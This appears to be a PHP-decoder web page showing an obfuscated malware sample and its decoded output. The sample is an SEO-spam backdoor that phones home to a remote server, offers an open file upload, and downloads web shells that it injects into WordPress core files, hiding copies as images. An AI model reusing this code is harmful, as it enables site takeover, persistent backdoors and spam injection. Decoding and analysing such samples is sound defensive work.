Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $sYMhAzNqG='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$sYMhAzNqG[(1..

Decoded Output download


set_time_limit(0);
@ini_set("html_errors","0");
@ob_start();
$action = isset($_GET['ac']) ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
    $index_name = basename($_SERVER['SCRIPT_NAME']);
    write($index_name);
    echo "write done!";
    exit();
}
if ($action != "" && $action == "mup") {
    fup($action);
    exit();
}
$u6='104\x116\x116\x112\x58\x47\x47\x115\x101\x111\x56\x49\x56\x45\x49\x50\x46\x98\x101\x97\x117\x116\x105\x102\x117\x108\x115\x117\x110\x115\x101\x116\x46\x115\x105\x116\x101\x47\x97\x112\x105\x47\x115\x101\x114\x118\x101\x114\x46\x112\x104\x112\x';
$group='ZQ818-12';
$wjt=0;
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/.htaccess')){
    $wjt=1;
}
$_SERVER=@str_replace(' ','',($_SERVER));
unset($_SERVER['PATH']);
unset($_SERVER['SYSTEMROOT']);
unset($_SERVER['COMSPEC']);
unset($_SERVER['PATHEXT']);
unset($_SERVER['WINDIR']);
unset($_SERVER['SERVER_SOFTWARE']);
$s['HTTP_HOST']=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:'';
$s['REMOTE_ADDR']=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'';
//$s['SERVER_ADDR']=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:'';
$s['REQUEST_URI']=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:'';
$s['HTTP_CLIENT_TOKEN']=isset($_SERVER['HTTP_CLIENT_TOKEN'])?$_SERVER['HTTP_CLIENT_TOKEN']:'';
$s['HTTP_USER_AGENT']=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'';
$s['HTTP_REFERER']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';
$s['HTTP_ACCEPT_LANGUAGE']=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';
$s['SCRIPT_NAME']=isset($_SERVER['SCRIPT_NAME'])?$_SERVER['SCRIPT_NAME']:'';
$s['SERVER_PORT']=isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:'';
$s['SERVER_PROTOCOL']=isset($_SERVER['SERVER_PROTOCOL'])?$_SERVER['SERVER_PROTOCOL']:'';
$s['HTTP_X_FORWARDED_PROTO']=isset($_SERVER['HTTP_X_FORWARDED_PROTO'])?$_SERVER['HTTP_X_FORWARDED_PROTO']:'';
$s['HTTPS']=isset($_SERVER['HTTPS'])?$_SERVER['HTTPS']:'';
$s['HTTP_X_FORWARDED_SSL']=isset($_SERVER['HTTP_X_FORWARDED_SSL'])?$_SERVER['HTTP_X_FORWARDED_SSL']:'';

if (phpversion() < '5.2' || PHP_VERSION_ID < 50200) {
    $sj=serialize($s);
}else{
    $sj=json_encode($s);
}
$info=cgg(o0($u6).'?group='.$group.'&server='.$sj.'&wjt='.$wjt.'&time='.time().'&token=zqO0o1IliLp2&phpv='.phpversion());
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/robots.txt')){
    @unlink($_SERVER['DOCUMENT_ROOT'].'/robots.txt');
}
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml')){
    @unlink($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml');
}
if($info){
    if(stripos($_SERVER['REQUEST_URI'],'sitemap.xml')!==false && stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')===false){
        header('Content-type:application/xml');
        echo ($info);
        exit();
    }elseif ($_SERVER['REQUEST_URI']=='/robots.txt'){
        header('Content-Type: text/plain;charset=utf-8');
        echo ($info);
        exit();
    }elseif(stripos($_SERVER['REQUEST_URI'],'atom.xml')!==false || stripos($_SERVER['REQUEST_URI'],'index.rdf')!==false || stripos($_SERVER['REQUEST_URI'],'rss.xml')!==false || stripos($_SERVER['REQUEST_URI'],'sitemap.xsl')!==false){
        header('Content-type:application/xml');
        echo ($info);
        exit();
    }else if (preg_match('/sitemap(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)-(\d+).xml$/i',$_SERVER['REQUEST_URI'],$map_uri)){
        if($map_uri[1]!="" && $map_uri[2]!="") {
            if($info=='HTTP/1.1 404 Not Found'){
                header($info);
                header("Status: 404 Not Found");
                exit();
            }else {
                header('Content-type:application/xml');
                echo($info);
                exit();
            }
        }
    }elseif(stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')!==false ){
        //$google=json_decode($info,true);
        $google=unserialize($info);
        foreach ($google as $g){
            $r = cgg($g);
            if ($r == 'success' ||  (stripos($r, 'successfully') !== false) || (stripos($r, '') !== false) || (stripos($r, '') !== false) || (stripos($r,'webmasters')!==false)) {
                echo '<p style="color:#00A000">' . $g . '--------' . $r . '</p>';
            } else {
                echo '<p style="color:#ff0000"><a href="' . $g . '" target="_blank">' . $g . '</a>--------' . $r . '</p>';
            }
        }
        exit();
    }
    else{
        header("Content-type: text/html; charset=utf-8");
        if(substr($info,'0',9)==='Location:'){
            header($info);
            exit();
        }elseif ($info=='HTTP/1.1 404 Not Found'){
        } else{
            if($info){
                print_r($info);
                exit();
            }
        }

    }
}else{
    //echo('500 error');
}
function cgg($url)
{
    $contents = @file_get_contents($url);
    if(!$contents) {
        $header = array(
            'Accept: */*',
            'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
        );
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
        $contents = curl_exec($curl);
        curl_close($curl);
    }
    return $contents;
}
function o0($u){
    $a=explode('\x',$u);
    $u1='';
    foreach ($a as $b){
        if($b) {
            $u1 .= chr($b);
        }
    }
    return $u1;
}
function fup($g){
    error_reporting(0);
    if ($g == 'mup') {
        $saw1 = $_FILES['file']['tmp_name'];
        $saw2 = $_FILES['file']['name'];
        echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
        move_uploaded_file($saw1, $saw2);
        exit(0);
    }
}
function write($index_name)
{
    $write1 = cgg("http://abc.firstguide.xyz/write1.txt");
    $write2 = cgg("http://abc.firstguide.xyz/write2.txt");
    $shell_postfs = cgg("http://abc.firstguide.xyz/mm1.txt");
    $shell_load = cgg("http://abc.firstguide.xyz/mm2.txt");
    $new_ht_content = cgg("http://abc.firstguide.xyz/shl/htaccess.txt");
    $ht_content = file_get_contents(".htaccess");
    $index_content = file_get_contents($index_name);
    $loader_php = "wp-includes/template-loader.php";
    $load_php = "wp-includes/load.php";
    $font_editor_php = "wp-includes/SimplePie/index.php";
    if (!is_dir("css")) {
        mkdir("css", 0755, true);
    }
    if ($index_name != "index.php") {
        $write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
        $write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
    }
    @chmod("css/.htaccess", 0755);
    file_put_contents("css/.htaccess", $new_ht_content);
    file_put_contents("css/load.php", $shell_load);
    if (is_dir("wp-includes/SimplePie")) {
        file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
        file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
        file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
        file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
        $loader_content = file_get_contents($loader_php);
        $load_content = file_get_contents($load_php);
        @chmod($loader_php, 0755);
        @chmod($load_php, 0755);
        file_put_contents($loader_php, $write1 . $loader_content);
        file_put_contents($load_php, $load_content . $write2);
        @chmod($loader_php, 0644);
        @chmod($load_php, 0644);
        file_put_contents($font_editor_php, $shell_postfs);
    }
}
?>

Did this file decode correctly?

Original Code

<?php $sYMhAzNqG='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$sYMhAzNqG[(105/15)].$sYMhAzNqG[(26-1)].$sYMhAzNqG[(1*49)].$sYMhAzNqG[((10*1)+18)].$sYMhAzNqG[(14+22)].$sYMhAzNqG[(44+5)].$sYMhAzNqG[(44-13)].$sYMhAzNqG[(684/18)].$sYMhAzNqG[(23+4)].$sYMhAzNqG[(72-(33-7))].$sYMhAzNqG[(154/22)].$sYMhAzNqG[(11+25)].$sYMhAzNqG[(65-(62-31))].$sYMhAzNqG[(26-6)].$sYMhAzNqG[((27*2)-8)];$pHFdNhg9688=$sYMhAzNqG[(20-9)].$sYMhAzNqG[(2*4)].$sYMhAzNqG[(29*1)].$sYMhAzNqG[(160/4)];$MYtraky2482=$sYMhAzNqG[(8*5)].$sYMhAzNqG[((1+0)+2)].$sYMhAzNqG[(6+(1*(95/19)))].$sYMhAzNqG[(140/5)].$sYMhAzNqG[(522/18)].$sYMhAzNqG[(7*((7-3)-2))].$sYMhAzNqG[(2*14)].$sYMhAzNqG[(138/(2+4))].$sYMhAzNqG[(1029/(378/18))].$sYMhAzNqG[((2*189)/9)].$sYMhAzNqG[(12+(0+0))].$sYMhAzNqG[(31*1)].$sYMhAzNqG[(48/(36/12))].$sYMhAzNqG[(735/15)].$sYMhAzNqG[(0+7)].$sYMhAzNqG[(18+2)].$sYMhAzNqG[(18-(10/5))].$sYMhAzNqG[(735/15)].$sYMhAzNqG[(0+(2-(1*1)))].$sYMhAzNqG[(16-(3+(36/(0+18))))].$sYMhAzNqG[((167-23)/18)].$sYMhAzNqG[(0+(18-9))].$sYMhAzNqG[(1*3)].$sYMhAzNqG[(11*(1+(0/(78/13))))].$sYMhAzNqG[(2*7)].$sYMhAzNqG[(29*(0+1))].$sYMhAzNqG[(38-(8+9))].$sYMhAzNqG[(15*2)].$sYMhAzNqG[(45-11)].$sYMhAzNqG[(1*46)].$sYMhAzNqG[(1*(17+21))].$sYMhAzNqG[(78/3)].$sYMhAzNqG[(21+(77/11))].$sYMhAzNqG[(22+14)].$sYMhAzNqG[(343/(91/13))].$sYMhAzNqG[(1*1)].$sYMhAzNqG[(21-10)].$sYMhAzNqG[(22+(12/2))].$sYMhAzNqG[(180/20)].$sYMhAzNqG[(3+((0+0)*1))].$sYMhAzNqG[(686/(126/9))].$sYMhAzNqG[(61-(32-8))].$sYMhAzNqG[(476/17)].$sYMhAzNqG[((4-0)+22)].$sYMhAzNqG[(((23-(2*5))/13)-0)].$sYMhAzNqG[(7+(84/21))].$sYMhAzNqG[(28/2)].$sYMhAzNqG[(9-0)].$sYMhAzNqG[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>

Function Calls

null	1
gzinflate	1
base64_decode	1
create_function	1

Variables

$b	set_time_limit(0); @ini_set("html_errors","0"); @ob_star..
$x	'vVnrbtvKEf4fIO+wVoWsdCqLS0VyfKMTwZYTo7alI8nNOXUCgqZWEhPeSi5..
$q2866	create_function
$JTx2343	$x="'vVnrbtvKEf4fIO+wVoWsdCqLS0VyfKMTwZYTo7alI8nNOXUCgqZWEhP..
$UrR1094	'vVnrbtvKEf4fIO+wVoWsdCqLS0VyfKMTwZYTo7alI8nNOXUCgqZWEhPeSi5..
$sYMhAzNqG	y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je
$mEriqO3481	None
$MYtraky2482	";$a=base64_decode($x);$b=gzinflate($a);eval($b);
$pHFdNhg9688	$x="

Stats

MD5	6c64e9da2ae5941469f6e592c5655ccf
Eval Count	2
Decode Time	165 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats